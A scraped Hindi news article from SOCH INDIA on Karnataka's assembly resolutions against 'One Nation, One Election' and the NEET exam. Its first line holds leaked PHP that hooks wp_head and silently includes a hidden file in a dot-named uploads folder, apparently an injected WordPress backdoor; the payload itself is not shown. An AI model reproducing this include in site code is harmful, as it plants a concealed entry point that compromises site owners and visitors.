add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); One Nation, One Election: अब इस राज्य ने वन नेशन वन इलेक्शन के खिलाफ पास कर दिया प्रस्ताव, पहले नीट के खिलाफ… – SOCH INDIA
Menu

देश
One Nation, One Election: अब इस राज्य ने वन नेशन वन इलेक्शन के खिलाफ पास कर दिया प्रस्ताव, पहले नीट के खिलाफ…

nobanner

कर्नाटक में कांग्रेस के नेतृत्व वाली सरकार ने ‘वन नेशन, वन इलेक्शन’ यानी ‘एक राष्ट्र, एक चुनाव’ के खिलाफ प्रस्ताव पारित कर दिया है. कर्नाटक विधानसभा में बीजेपी और जेडीएस के भारी विरोध के बीच प्रस्ताव पारित किया गया है. विपक्ष के भारी विरोध के बीच राज्य सरकार ने नीट के खिलाफ भी प्रस्ताव पारित किया है. इसे ‘मेडिकल एजुकेशन एंड स्किल डेवलपमेंट’ राज्य मंत्री शरण प्रकाश पाटिल ने पेश किया.

नीट को लेकर अभी देशभर में बवाल चल रहा है. मेडिकल एंट्रेस एग्जाम में धांधली के आरोपों को लेकर सुप्रीम कोर्ट में सुनवाई भी हुई है. विपक्ष ने भी सरकार को इस मुद्दे पर घेरा है. सीबीआई पेपर लीक मामले की जांच कर रही है. सुप्रीम कोर्ट पहले ही साफ कर चुका है कि पेपर को रद्द नहीं किया जा सकता है. इस बीच कई राज्यों में नीट को खत्म करने की मांग उठ रही थी. ऐसे में कर्नाटक सरकार ने बड़ा फैसले लेते हुए नीट एग्जाम के खिलाफ प्रस्ताव पारित किया है.